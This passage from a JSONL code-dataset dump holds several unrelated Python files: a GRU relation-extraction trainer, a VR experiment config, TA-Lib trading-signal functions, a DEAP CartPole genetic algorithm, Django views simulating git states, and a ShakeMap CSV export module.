0.1, (hiddenSize, vectorLength))), requires_grad=True)\nUr = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (hiddenSize, hiddenSize))), requires_grad=True)\nW = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (hiddenSize, vectorLength))), requires_grad=True)\nU = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (hiddenSize, hiddenSize))), requires_grad=True)\nWz = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (hiddenSize, vectorLength))), requires_grad=True)\nUz = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (hiddenSize, hiddenSize))), requires_grad=True)\nWentity = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (hiddenSize, entityVecSize))), requires_grad=True)\n\nsoftmaxLayer_W = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (classNumber, hiddenSize*1))), requires_grad=True)\nsoftmaxLayer_b = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (classNumber, 1))), requires_grad=True)\nattention_w = Variable(torch.FloatTensor(np.random.uniform(-0.1, 0.1, (entityVecSize, hiddenSize))), requires_grad=True)\n#rnn = nn.GRU(vectorLength, hiddenSize, dropout=0.5, bidirectional=False)\nsoftmax = torch.nn.Softmax()\nloss_function = torch.nn.NLLLoss()\n\ndef RNN(mulInstance, e1, e2, relation):\n rnnOut = []\n instanceLength = len(mulInstance)\n e1 = entityEmbed(e1).transpose(0,1)\n e2 = entityEmbed(e2).transpose(0,1)\n if relation.data.numpy()[0] == -1:\n relation = Variable(torch.zeros(entityVecSize, 1))\n else:\n relation = relationEmbed(relation).transpose(0,1)\n for instance in mulInstance:\n contxtWords, sentLength, offsetE1, offsetE2, p1, p2 = instance\n positionsE1 = positionVar(offsetE1)\n positionsE2 = positionVar(offsetE2)\n contxtWords = embed(contxtWords)\n contxtWords = torch.cat([contxtWords, positionsE1, positionsE2], 1)\n\n outputs = []\n pre_h = Variable(torch.zeros(hiddenSize, 1))\n for i in range(sentLength):\n xi = contxtWords[i].view(vectorLength, 1)\n # ri = σ(Wr * xi + Ur*hi−1)\n ri = torch.sigmoid(torch.mm(Wr, xi) + torch.mm(Ur, pre_h))\n # h~i = Φ(W * xi + U * (ri ⊗ hi−1))\n hh = torch.tanh(torch.mm(W, xi) + torch.mm(U, ri * pre_h))\n # zi = σ(Wz * xi + Uz * hi−1)\n zi = torch.sigmoid(torch.mm(Wz, xi) + torch.mm(Uz, pre_h))# + torch.mm(Wentity, e1) + torch.mm(Wentity, e2))\n # hi = zi ⊗ hi−1 + ((1; 1; :::; 1)T − zi) ⊗ h~i\n hi = zi * pre_h + (1.0 - zi) * hh\n\n outputs.append(hi)\n pre_h = hi\n output = torch.cat(outputs, 1)\n #output, hn = rnn(contxtWords.view(sentLength, 1, vectorLength))\n\n #output = output.view(sentLength, hiddenSize*1).transpose(0,1)\n output = torch.max(output,1)[0]\n rnnOut.append(output)\n contxtWords = torch.cat(rnnOut, 1)\n alpha = softmax(torch.mm(relation.transpose(0,1), torch.mm(attention_w, contxtWords))).transpose(0,1)\n output = torch.mm(contxtWords, alpha)\n finallinearLayerOut = torch.mm(softmaxLayer_W, output) + softmaxLayer_b\n \n return finallinearLayerOut.transpose(0,1)\n\ndef lossModel(mulInstance, e1V, e2V, relation, label):\n finallinearLayerOut = RNN(mulInstance, e1V, e2V, relation)\n\n log_prob = F.log_softmax(finallinearLayerOut)\n total_loss = loss_function(log_prob, Variable(torch.LongTensor([label])))\n calssification = softmax(finallinearLayerOut)\n\n return total_loss, calssification\n\ndef testModel(mulInstance, e1V, e2V, relation):\n finallinearLayerOut = RNN(mulInstance, e1V, e2V, relation)\n \n calssification = softmax(finallinearLayerOut)\n\n return calssification\n\nparameters = [softmaxLayer_W,\n softmaxLayer_b,\n Wr, Ur, W, U, Wz, Uz, attention_w]\nparameters.append(positionVar.weight)\nparameters.append(relationEmbed.weight)\nparameters.append(embed.weight)\n# parameters.append(entityEmbed.weight)\n#parameters = parameters + list(conv1.parameters()) + list(conv2.parameters())+ list(conv3.parameters())\noptimizer = optim.Adam(parameters, lr = 0.01, weight_decay=0.1)\n\ndef GetPosition(sentence):\n pos = []\n items = sentence.split(\" \")\n n = len(items)\n\n posForSentE1 = list(range(1, n-1))\n posForSentE2 = list(range(-n+2, 0))\n\n return posForSentE1, posForSentE2, 0, n-1\n\ndef GetSampleProperty(samples):\n mulInstance = []\n label = 0\n e1ID = None\n e1V = None \n e2ID = None\n e2V = None\n relation = None\n \n for sample in samples:\n sentid = sample[0]\n posForSentE1, posForSentE2, posE1, posE2 = GetPosition(sample[1])\n words = sample[1].split(\" \")\n n = len(words) - 2\n \n offsetE1 = Variable(torch.LongTensor([index + maxlen for index in posForSentE1]))\n offsetE2 = Variable(torch.LongTensor([index + maxlen for index in posForSentE2]))\n contxtWords = Variable(torch.LongTensor([word2id[words[i]] for i in range(0, n)]))\n\n e1ID = sample[2]\n e1 = entity2id[e1ID]\n\n e2ID = sample[3]\n e2 = entity2id[e2ID]\n\n e1V = Variable(torch.LongTensor([int(e1)]))\n e2V = Variable(torch.LongTensor([int(e2)]))\n\n pairStr0 = str(e1) + \"_\" + str(e2)\n pairStr1 = str(e2) + \"_\" + str(e1)\n if pairStr0 in triples:\n relation = Variable(torch.LongTensor([ int(triples[pairStr0]) ]))\n elif pairStr1 in triples:\n relation = Variable(torch.LongTensor([ int(triples[pairStr1]) ]))\n #e1V, e2V = e2V, e1V\n else:\n relation = Variable(torch.LongTensor([-1]))\n # relation = (e2V - e1V)\n # if e1ID == e2ID:\n # e1V = torch.cat([entity2vector[\"reserved\"], positionVar[0], positionVar[posE2 - posE1]])\n label = int(sample[5])\n mulInstance.append((contxtWords, n, offsetE1, offsetE2, posE1, posE2))\n return mulInstance, sentid, e1ID, e1V, e2ID, e2V, relation, label\n\ndef test(testSet, resultStream=None, probPath=None):\n count = 0\n correct = 0\n time0 = time.time()\n probs = []\n for sample in testSet:\n mulInstance, sentid, e1ID, e1V, e2ID, e2V, relation, label = sample\n\n calssification = testModel(mulInstance, e1V, e2V, relation)\n prob = calssification.data.numpy().reshape(classNumber)\n predict = np.argmax(prob)\n probs.append(prob)\n if resultStream and predict == 1:\n resultStream.write(\"\\t\".join([sentid, e1ID, e2ID]) + \"\\n\")\n\n if predict == label:\n correct += 1.0\n count += 1\n if probPath:\n np.savetxt(probPath, probs, '%.5f',delimiter=' ')\n time1 = time.time()\n acc = correct/count\n print(\"test Acc: \", acc)\n print(\"time : \", str(time1 - time0))\n return acc\n #np.savetxt(resultOutput + \"predict_\" + str(epoch_idx) + \".txt\", np.asarray(results, dtype=np.float32), fmt='%.5f',delimiter=' ')\n\ntrainset = []\nfor sample in trainSet:\n sampleTuple = GetSampleProperty(sample)\n trainset.append(sampleTuple)\n\ntestset = []\nfor sample in testSet:\n sampleTuple = GetSampleProperty(sample)\n testset.append(sampleTuple)\n\ntrainsetSize = len(trainset)\nvalidationSet = trainSet[trainsetSize:]\nvalidationSize = len(validationSet)\n\nmaxacc = 0\nmaxp = 0\nmaxr = 0\nmaxf = 0\ngoldPath = \"/home/laboratory/lab/BioCreative/2017/BC6/bc2_ips_pmid2ppi_test\"+foldN+\".txt\"\nfor epoch_idx in range(num_epoches):\n \n np.random.shuffle(trainset)\n sum_loss= Variable(torch.Tensor([0]))\n print(\"=====================================================================\")\n print(\"epoch \" + str(epoch_idx) + \", trainSize: \" + str(trainsetSize) + \", validationSize: \" + str(validationSize))\n print(\"hop size: \", str(hopNumber))\n\n count = 0\n correct = 0\n time0 = time.time() \n optimizer.zero_grad() \n for sample in trainset:\n mulInstance, sentid, e1ID, e1V, e2ID, e2V, relation, label = sample\n total_loss, calssification = lossModel(mulInstance, e1V, e2V, relation, label)\n sum_loss = torch.add(sum_loss, total_loss)\n\n predict = np.argmax(calssification.data.numpy())\n if predict == label:\n correct += 1.0\n count += 1\n\n####################Update#######################\n if count % batchSize == 0:\n sum_loss.backward()\n optimizer.step()\n sum_loss = Variable(torch.Tensor([0]))\n for para in parameters:\n para._grad.data.zero_()\n optimizer.zero_grad()\n\n sum_loss.backward()\n optimizer.step()\n optimizer.zero_grad()\n####################Update#######################\n\n time1 = time.time()\n print(\"Iteration\", epoch_idx, \"Loss\", sum_loss.data.numpy()[0] / batchSize, \"train Acc: \", float(correct / count) , \"time: \", str(time1 - time0))\n \n acc = 1#test(validationSet)\n if acc > maxacc:\n currentResult = resultOutput + \"result_\" + str(epoch_idx) + \".txt\"\n resultStream = open(currentResult, 'w')\n probPath = resultOutput + \"prob_\" + str(epoch_idx) + \".txt\"\n test(testset, resultStream, probPath)\n resultStream.close()\n \n p, r, f = prf(currentResult, goldPath)\n if p == 0 and r == 0 and f == 0:\n continue\n\n if p >= maxp:\n maxp = p\n torch.save(parameters, \"./mulInstacemodel_p\")\n if r >= maxr:\n maxr = r\n torch.save(parameters, \"./mulInstacemodel_r\")\n if f >= maxf:\n maxf = f\n torch.save(parameters, \"./mulInstacemodel_f\")\n","sub_path":"model/GRU_mulInstance_relation.py","file_name":"GRU_mulInstance_relation.py","file_ext":"py","file_size_in_byte":12538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"519707741","text":"# Object experiment\n\nfrom Experiments.VR import *\nfrom Behavior import *\nfrom Stimuli.VROdors import *\nfrom utils.Generator import *\n\n\nconditions = []\n\n# define session parameters\nsession_params = {\n 'trial_selection' : 'fixed',\n 'reward' : 'water',\n 'noresponse_intertrial' : True,\n 'resp_cond' : 'correct_loc'\n}\n\n# define environment conditions\nkey = {\n 'background_color' : (.01, .01, .01),\n 'ambient_color' : (0.1, 0.1, 0.1, 1),\n 'direct1_color' : (0.7, 0.7, 0.7, 1),\n 'direct1_dir' : (0, -20, 0),\n 'direct2_color' : (0.2, 0.2, 0.2, 1),\n 'direct2_dir' : (180, -20, 0),\n 'init_ready' : 0,\n 'cue_ready' : 100,\n 'delay_ready' : 0,\n 'resp_ready' : 0,\n 'intertrial_duration' : 0,\n 'cue_duration' : 20000,\n 'delay_duration' : 5000,\n 'response_duration' : 4000,\n 'reward_amount' : 8,\n 'reward_duration' : 2000,\n 'punish_duration' : 1000,\n 'obj_dur' : 20000,\n 'obj_delay' : 0,\n 'ready_loc' : [[0,0]],\n 'probe' : 1\n}\n\nnp.random.seed(0)\nconditions += factorize({**key,\n 'difficulty': 1,\n 'obj_id' : 1,\n 'correct_loc': [[0, 0]],\n 'obj_pos_x' : [0,1],\n 'obj_pos_y' : [0,1],\n 'obj_mag' : 0,\n 'obj_rot' : 0,\n 'obj_tilt' : 0,\n 'obj_yaw' : 0,\n 'obj_period': 'Response',\n 'cue_ready' : 0,\n 'response_duration': 240000,\n 'obj_dur' : 0,\n 'touch_area': [[(500,300)]]})\n\nobj_timepoints = 5\nobj_combs = [[1, 1], [1, 1], [2, 2], [2, 2]]\ncorrect_loc = [(-0.25,0),(0.25,0),(0.25,0),(-0.25,0)]\nobj_posX = [[0, -.25], [0, .25], [0, .25], [0, -.25]]\nfor idx, obj_comb in enumerate(obj_combs):\n rot_f = lambda: interp(np.random.rand(obj_timepoints) *200)\n conditions += factorize({**key,\n 'difficulty': 2,\n 'obj_id' : [obj_comb],\n 'correct_loc': [correct_loc[idx]],\n 'obj_pos_x' : [obj_posX[idx]],\n 'obj_pos_y' : [[-0.13,-0.13,-0.13]],\n 'obj_mag' : .5,\n 'obj_rot' : [[rot_f(), rot_f()]],\n 'obj_tilt' : 0,\n 'obj_yaw' : 0,\n 'obj_period': [['Cue', 'Response']]})\n\n\n# run experiments\nexp = State()\nexp.setup(logger, VRBehavior, VROdors, session_params, conditions)\nexp.run()\n\n\n","sub_path":"conf/vr_test.py","file_name":"vr_test.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"270385439","text":"# coding=utf-8\n\"\"\"指标根据输入的参数生���的买卖信号的函数\"\"\"\nimport talib\n\n\ndef ma_cross(apply_price, N, n, a1, b1, c1, a2, b2, c2):\n \"\"\"\n 黄金交叉和死亡交叉\n z = MA(N) - MA(n)\n 买入信号:\n 若z[i] >= 0 ,找到最近的j, j b1 * c1 且\n z[i] < min(mz/a1, c1)\n 卖出信号:\n 若z[i] < 0 ,找到最近的j, j=0>z[j], Mz=max(-z[j],-z[j+1], ...,-z[i]), 若mz > b1 * c1 且\n z[i] < min(mz/a1, c1)\n Parameters\n ----------\n apply_price:[array, list], 计算的价格序列\n N:[int], ma的长周期\n n:[int], ma的短周期\n a1:[double]\n b1:[double]\n c1:[double]\n a2:[double]\n b2:[double]\n c2:[double]\n \"\"\"\n long_ma = talib.MA(apply_price, timeperiod=N)\n short_ma = talib.MA(apply_price, timeperiod=n)\n z = long_ma - short_ma\n _signal_pos = []\n index = 2\n\n while index < len(z):\n item = z[index]\n flag = False\n # 买入点\n if item >= 0:\n i = 1\n while (index - i) >= 0:\n if z[index - i - 1] <= 0 < z[index - i]:\n flag = True\n break\n i += 1\n if flag:\n mz = max(z[(index - i):(index + 1)])\n if mz > b1 * c1 and item < min(mz / a1, c1):\n _signal_pos.append((index, -1))\n # 卖出点\n else:\n i = 1\n while (index - i) >= 0:\n if z[index - i - 1] >= 0 > z[index - i]:\n flag = True\n break\n i += 1\n if flag:\n mz = max(map(lambda x: -x, z[(index - i):(index + 1)]))\n if mz > b2 * c2 and item < min(mz / a2, c2):\n _signal_pos.append((index, 1))\n index += 1\n return _signal_pos\n\n\ndef envelope(apply_price, period, uBandWith, lBandWith):\n \"\"\"\n\n Parameters\n ----------\n apply_price:价格序列\n period:ma的周期\n uBandWith:maEnvelope上轨宽度\n lBandWith:maEnvelope下轨宽度\n \"\"\"\n ma = talib.MA(apply_price, timeperiod=period)\n _signal_pos = []\n p1 = ma + uBandWith\n p2 = ma - lBandWith\n for i in range(len(ma)):\n # 买入信号\n if apply_price[i] < p2[i]:\n _signal_pos.append((i, -1))\n continue\n # 卖出信号\n if apply_price[i] > p1[i]:\n _signal_pos.append((i, 1))\n continue\n return _signal_pos\n\n\ndef rsi(apply_price, period, over_buy, over_sell, slope_p, slope_q):\n \"\"\"\n Parameters\n ----------\n apply_price:价格序列\n period:RSI的周期\n over_buy:超过此指认为超买,将下跌\n over_sell:超过此值认为炒卖,将上涨\n slope_p:rsi超过炒买值后,从超买值点开始画一条斜线,该线的斜率为slope_p\n slope_q:rsi超过炒卖值后,从超买值点开始画一条斜线,该线的斜率为slope_q\n \"\"\"\n rsi = talib.RSI(apply_price, timeperiod=period)\n _signal_pos = []\n for index, item in enumerate(rsi):\n # 卖出点:当指标达到超买线,从超买值点开始画一条斜线的斜率小于slope_p\n if item > over_buy:\n zero1 = index\n value1 = item + slope_p * (index - zero1)\n if item < value1:\n _signal_pos.append((index, 1))\n continue\n # 买入点:当指标达到超卖线,从超买值点开始画一条斜线的斜率大于slope_q\n if item < over_sell:\n zero2 = index\n value2 = item - slope_q * (index - zero2)\n if item > value2:\n _signal_pos.append((index, -1))\n continue\n return _signal_pos\n\n\ndef roc(apply_price, long_period, short_period, u_border, l_border, u_band, l_band):\n \"\"\"\n Parameters\n ----------\n apply_price:价格序列\n long_period:长期roc的周期\n short_period:短期roc的周期\n u_border:长期roc的上界\n l_border:长期roc的下界\n u_band:均衡线上轨的宽度\n l_band:均衡线下轨的宽度\n \"\"\"\n long_roc = talib.ROC(apply_price, timeperiod=long_period)\n short_roc = talib.ROC(apply_price, timeperiod=short_period)\n _signal_pos = []\n u_equilibrium = 100 + u_band\n l_equilibrium = 100 - l_band\n\n for index in range(len(apply_price)):\n # 卖出点:当长期ROC大于上界且短期ROC在均衡线附近\n if long_roc[index] > u_border and (l_equilibrium <= short_roc[index] <= u_equilibrium):\n _signal_pos.append((index, 1))\n continue\n # 买入点:当长期ROC小于下界且短期ROC在均衡线附近\n if long_roc[index] < l_border and (l_equilibrium <= short_roc[index] <= u_equilibrium):\n _signal_pos.append((index, -1))\n continue\n return _signal_pos\n\n\ndef stochastic_oscillator(time_series, a, b, c, d):\n \"\"\"随机震荡指标\"\"\"\n _signal_pos = []\n _k, _d = talib.STOCH(time_series[\"close\"].values, time_series[\"high\"].values,\n time_series[\"low\"].values)\n for index in range(len(time_series)):\n if _k[index] > _d[index] and (_k[index] < a and _k[index] - _d[index] < b):\n _signal_pos.append((index, -1))\n continue\n if _k[index] < _d[index] and (_k[index] > c and _d[index] - _k[index] < d):\n _signal_pos.append((index, 1))\n continue\n return _signal_pos\n\n\ndef hammer(time_series, a):\n hammmer = talib.CDLHAMMER(time_series[\"open\"].values, time_series[\"high\"].values,\n time_series[\"low\"].values, time_series[\"close\"].values)\n\n\n","sub_path":"data_analysis/indicator_analysis/IndicatorSignal.py","file_name":"IndicatorSignal.py","file_ext":"py","file_size_in_byte":5729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"498747205","text":"import random\nimport time\n\nimport neural_net as net\n\nfrom deap import base, creator, tools, algorithms\nimport multiprocessing\n\nimport numpy as np\n\nimport gym\ngym.logger.set_level(40)\n\n# global control vars\npopulation_size = 10\nnum_generations = 5\nmutation_probability = 0.2\nmate_probability = .5\ncurrent_env = 'CartPole-v0'\n\nnet_inputs = 4\nnet_outputs = 2\n# only 1 hidden layer for now\nnum_hidden_nodes = 2\n\n\ndef mutate_individual(individual, indpb=.1):\n for idx in range(len(individual)):\n # randomly mutate individual genes\n if np.random.random(1) < indpb:\n # randomly decide the mutation\n decision = float(np.random.random(1))\n\n rand = float(np.random.random(1))\n\n # whole new weight\n if decision < .25:\n individual[idx] = 2 * rand - 1\n continue\n # change weight by random percentage\n if decision < .5:\n multiplier = rand / 1.5 # get the multiplier on the range of [.5,1.5)\n individual[idx] = individual[idx] * multiplier\n continue\n if decision < .75:\n sign = 1\n # to make this randomly addition or subtraction\n if np.random.random(1) < .5:\n sign = -sign\n individual[idx] += (rand * sign)\n continue\n # do something as if 1>rand>.75\n individual[idx] = -individual[idx]\n\n return individual,\n\n\ndef ind_to_np_array(x):\n return np.array([arr for arr in x])\n\n\ndef create_individual(individual):\n # 4 inputs, 2 outputs, 5 nodes in hidden layer\n layer1_weights, layer2_weights = net.get_rand_weights(net_inputs, net_outputs, num_hidden_nodes)\n\n weights = net.flatten(layer1_weights, layer2_weights)\n\n return individual(x for x in weights)\n\n\n# this will be a loop for a individual's attempt at the game\ndef evaluate_individual(individual, display=False):\n flat_weights = ind_to_np_array(individual)\n\n layer1_w, layer2_w = net.un_flatten(net_inputs, num_hidden_nodes, net_outputs, flat_weights)\n\n # do this to avoid 200 step limit\n env = gym.make(current_env).env\n observation = env.reset()\n fitness = 0\n\n for t in range(1500):\n if display:\n env.render()\n # print(observation)\n\n # get observation into np array\n obs = ind_to_np_array(observation)\n\n # to gain either top value'd choice (classification) or just value (single output)\n if net_outputs > 1:\n # forward propagate based on the observation and store result as a list\n result = list(net.forward_prop(obs, layer1_w, layer2_w))\n\n # action agent will take is based on output with max result\n result = result.index(max(result))\n else:\n result = net.forward_prop(obs, layer1_w, layer2_w)\n\n # take a step\n observation, reward, done, info = env.step(result)\n\n # add reward to agent's fitness\n fitness += reward\n\n if done:\n if display:\n print(\"Episode finished after {} time steps\".format(t + 1))\n break\n return fitness,\n\n\ncreator.create(\"FitnessMax\", base.Fitness, weights=(1.0,))\ncreator.create(\"Individual\", list, fitness=creator.FitnessMax)\n\ntoolbox = base.Toolbox()\n\n# define 'individual' to have len(goalString) 'rand_weight' elements ('genes')\ntoolbox.register(\"individual\", create_individual, creator.Individual)\n# define the population to be a list of individuals\ntoolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n# register the fitness function\ntoolbox.register(\"evaluate\", evaluate_individual)\n# register the crossover function\ntoolbox.register(\"mate\", tools.cxUniform, indpb=.5)\n# register a mutation operator with a probability to flip each gene of 0.05\ntoolbox.register(\"mutate\", mutate_individual)\n# set the selection method to grab the top performers\ntoolbox.register(\"select\", tools.selTournament, tournsize=3)\n\nif __name__ == '__main__':\n # seed the random\n random.seed(int(time.time()))\n np.random.seed(int(time.time()))\n\n # Process Pool of 8 workers\n pool = multiprocessing.Pool(processes=8)\n toolbox.register(\"map\", pool.map)\n\n try:\n # create an initial population of individuals\n pop = toolbox.population(n=population_size)\n hof = tools.HallOfFame(1)\n stats = tools.Statistics(lambda ind: ind.fitness.values)\n stats.register(\"avg\", np.mean)\n stats.register(\"std\", np.std)\n stats.register(\"min\", np.min)\n stats.register(\"max\", np.max)\n\n current_max_fitness = -1e10\n\n # Evolution loop\n while current_max_fitness < 1000:\n pop, book = algorithms.eaSimple(pop, toolbox,\n cxpb=mate_probability, # probability of mating 2 individuals\n mutpb=mutation_probability, # probability of mutating an individual\n ngen=num_generations, # number of generations\n stats=stats, # statistics object\n halloffame=hof) # contains the best individuals\n\n bestInd = hof\n\n current_fitness = float(bestInd[0].fitness.values[0])\n if current_fitness > current_max_fitness:\n current_max_fitness = current_fitness\n print(\"Current max fitness: {0}\".format(current_max_fitness))\n evaluate_individual(bestInd[0], True)\n\n print(\"Current max fitness: {0}\".format(current_max_fitness))\n # always close the thread pool\n finally:\n one, two = net.un_flatten(net_inputs, num_hidden_nodes, net_outputs, ind_to_np_array(bestInd[0]))\n print('\\nThe weights of the best individual')\n print(one)\n print(two)\n pool.close()\n\n print(\"-- End of evolution --\")\n","sub_path":"GeneticAlg_CartPole/genetic_driver.py","file_name":"genetic_driver.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"193540722","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom app.arquivo.models import Arquivo\nfrom app.repositorio.models import Repositorio\nfrom app.ciclo_arquivo.models import *\nfrom app.logs.models import Log\nfrom random import randint\n\n\n# Create your views here.\ndef arquivo(request):\n \n if request.method == 'POST':\n if \"modified_arquivo\" in request.POST:\n\n arquivo = Arquivo.objects.get(id=request.POST.get(\"arquivo_id\"))\n \n ciclo_arquivo_modified = Modified.objects.create(\n arquivo = arquivo,\n alteracoes = request.POST.get(\"modified_arquivo\")\n )\n\n Untracked.objects.get(arquivo_id=request.POST.get(\"arquivo_id\")).delete()\n Unmodified.objects.get(arquivo_id=request.POST.get(\"arquivo_id\")).delete()\n\n return redirect('arquivo')\n \n elif \"arquivo_id_confirmacao\" in request.POST:\n \n arquivo_modified = Modified.objects.get(arquivo_id=request.POST.get(\"arquivo_id_confirmacao\"))\n arquivo = Arquivo.objects.get(id=arquivo_modified.arquivo_id)\n \n Staged.objects.create(\n arquivo=arquivo,\n commit=request.POST.get(\"commit\")\n )\n ciclo_arquivo_modified = Modified.objects.get(arquivo_id=request.POST.get(\"arquivo_id_confirmacao\")).delete()\n return redirect('arquivo')\n\n \n elif \"arquivo_id_git_push\" in request.POST:\n\n arquivo = Staged.objects.get(arquivo_id=request.POST.get(\"arquivo_id_git_push\"))\n repositorio = Repositorio.objects.get(id=1)\n \n Log.objects.create(\n repositorio = repositorio,\n commit = arquivo.commit,\n rasch = randint(0,100000)\n )\n\n Staged.objects.get(arquivo_id=request.POST.get(\"arquivo_id_git_push\")).delete()\n\n return redirect('arquivo') \n\n elif \"arquivo_id_git_add\" in request.POST:\n\n arquivo_id = Arquivo.objects.get(id=request.POST.get(\"arquivo_id_git_add\"))\n\n cliclo_arquivo_untracked = Untracked.objects.create(\n arquivo=arquivo_id\n )\n\n cliclo_arquivo_unmodified = Unmodified.objects.create(\n arquivo=arquivo_id\n )\n\n Arquivo.objects.filter(id=request.POST.get(\"arquivo_id_git_add\")).update(status = False)\n\n return redirect('arquivo')\n \n else:\n \n repositorio = Repositorio.objects.get(id=request.session['nome'])\n \n arquivo = Arquivo.objects.create(\n repositorio_usuario = repositorio,\n nome = request.POST.get(\"nome-arquivo\")\n )\n \n # arquivo_id = Arquivo.objects.get(nome=request.POST.get(\"nome-arquivo\"))\n\n # cliclo_arquivo_untracked = Untracked.objects.create(\n # arquivo=arquivo_id\n # )\n\n # cliclo_arquivo_unmodified = Unmodified.objects.create(\n # arquivo=arquivo_id\n # )\n\n return redirect('arquivo')\n\n\n elif request.method == 'GET':\n \n request.session['nome'] = request.GET.get(\"repositorio\")\n # arquivo_repositorio_usuario_id=request.session['nome']\n arquivos = Arquivo.objects.filter(status=True)\n untracked = Untracked.objects.all()\n unmodified = Unmodified.objects.all()\n modified = Modified.objects.all()\n staged = Staged.objects.all()\n \n dados = {\n \"untracked\": untracked,\n \"unmodified\": unmodified,\n \"modified\": modified,\n \"staged\": staged,\n \"arquivos\": arquivos\n }\n\n \n return render(request, 'arquivo.html', dados)","sub_path":"app/arquivo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"391453875","text":"from status import Status, UserHistory\nfrom permissions import permission_required\nfrom exceptions import UserError\n\n\nclass User:\n\n def __init__(self, name, status, current_disease=None,\n medical_treatment = None):\n self.name = name\n self.status = Status(status, current_disease, medical_treatment)\n self._permissions = []\n self.group = None\n self.history = UserHistory(self)\n\n # getting permissions from group\n def _set_permissions(self, group_permissions):\n self._permissions = group_permissions\n\n # Usually there'll be no need because\n # permissions are got from func _get_permissions()\n def _set_group(self, group):\n self.group = group\n\n\n @staticmethod\n def create_user(user_type, name, status):\n if user_type == 'Patient':\n return Patient(name, status)\n elif user_type == 'Doctor':\n return Doctor(name, status)\n else:\n raise UserError(f\"There\\'s no user type {user_type}\")\n\n\nclass Patient(User):\n\n def set_status(self, new_status):\n if new_status == 'Ok' and self.status != 'Ok': # if user recovers after disease\n self.history.write_history(self.status)\n self.status = new_status\n\n\nclass Doctor(User):\n\n @permission_required('CHANGE_STATUS')\n def change_status(self, patient, new_status):\n patient.set_status(new_status)\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"MedLogic/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600784259","text":"# stdlib imports\nimport os.path\nimport json\n\n# third party imports\nimport numpy as np\nimport pandas as pd\nimport h5py\nfrom impactutils.io.smcontainers import ShakeMapOutputContainer\n\n# local imports\nfrom .base import CoreModule, Contents\nfrom shakemap.utils.config import get_config_paths\n\n\nclass PointCSVModule(CoreModule):\n \"\"\"\n info -- Extract point data from shake_result.hdf and write as CSV file.\n \"\"\"\n\n command_name = 'pointcsv'\n targets = [r'products/points\\.csv']\n dependencies = [('products/shake_result.hdf', True)]\n\n def __init__(self, eventid):\n super(PointCSVModule, self).__init__(eventid)\n self.contents = Contents(None, None, eventid)\n\n def execute(self):\n \"\"\"\n Write points.csv data file from a \"points\" run of ShakeMap.\n\n Raises:\n NotADirectoryError: When the event data directory does not exist.\n FileNotFoundError: When the the shake_result HDF file does not\n exist.\n \"\"\"\n install_path, data_path = get_config_paths()\n datadir = os.path.join(data_path, self._eventid, 'current', 'products')\n if not os.path.isdir(datadir):\n raise NotADirectoryError('%s is not a valid directory.' % datadir)\n datafile = os.path.join(datadir, 'shake_result.hdf')\n if not os.path.isfile(datafile):\n raise FileNotFoundError('%s does not exist.' % datafile)\n fileobj = h5py.File(datafile, 'r')\n rows = {}\n arrays = fileobj['arrays']['imts']['GREATER_OF_TWO_HORIZONTAL']\n ids = list(arrays['MMI']['ids'][()])\n ids = [id.decode('utf8') for id in ids]\n rows['id'] = ids\n rows['lat'] = arrays['MMI']['lats'][()]\n rows['lon'] = arrays['MMI']['lons'][()]\n\n for imt, array in arrays.items():\n mean_column = array['mean'][()]\n std_column = array['std'][()]\n mean_col = f'{imt}_mean'\n std_col = f'{imt}_std'\n rows[mean_col] = mean_column\n rows[std_col] = std_column\n\n dataframe = pd.DataFrame(rows)\n outfile = os.path.join(datadir, 'points.csv')\n dataframe.to_csv(outfile, index=False)\n\n cap = 'ShakeMap points results in CSV format.'\n self.contents.addFile('supplementalInformation',\n 'Supplemental Information', cap,\n 'points.csv', 'application/text')\n","sub_path":"shakemap/coremods/pointcsv.py","file_name":"pointcsv.py","file_ext":"py","file_size_in_byte":2427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"223676523","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Hero, Set, Item\nfrom decimal import *\nfrom operator import itemgetter\nimport json\nfrom collections import OrderedDict\nimport json\nimport tests\n# Create your views here.\n\ndef home(request):\n\t# Display home page\n\treturn render(request, \"home.html\", {})\n\ndef about(request):\n\t# Display about page\n\treturn render(request, \"about.html\", {})\n\ndef heroes(request):\n\t'''\n\t# Build hero database\n\twith open('herodigest.json') as data_file: \n\t\tdata = json.load(data_file)\n\n\tfor hero_name in data:\n\t\t_hero_name = hero_name.replace(\" \", \"_\").lower()\n\t\thero_data = data[hero_name]\n\n\t\t# Create hero entry\n\t\th = Hero.objects.get_or_create(\n\t\t\tname=_hero_name,\n\t\t\thero_type=hero_data['primary'],\n\t\t\tdescription=hero_data['lore'],\n\t\t\tstrength=hero_data['strength'],\n\t\t\tagility=hero_data['agility'],\n\t\t\tintelligence=hero_data['intelligence'] )\n\t'''\n\n\t# Query all heroes\n\tall_heroes = Hero.objects.all()\n\n\t# Build a list of hero dictionaries\n\theroes = []\n\tfor hero in all_heroes:\n\t\td = {\n\t\t\t\"name\" : hero.name.replace(\"_\", \" \").title(),\n\t\t\t\"type\" : hero.hero_type,\n\t\t\t\"strength\" : hero.strength,\n\t\t\t\"agility\" : hero.agility,\n\t\t\t\"intelligence\" : 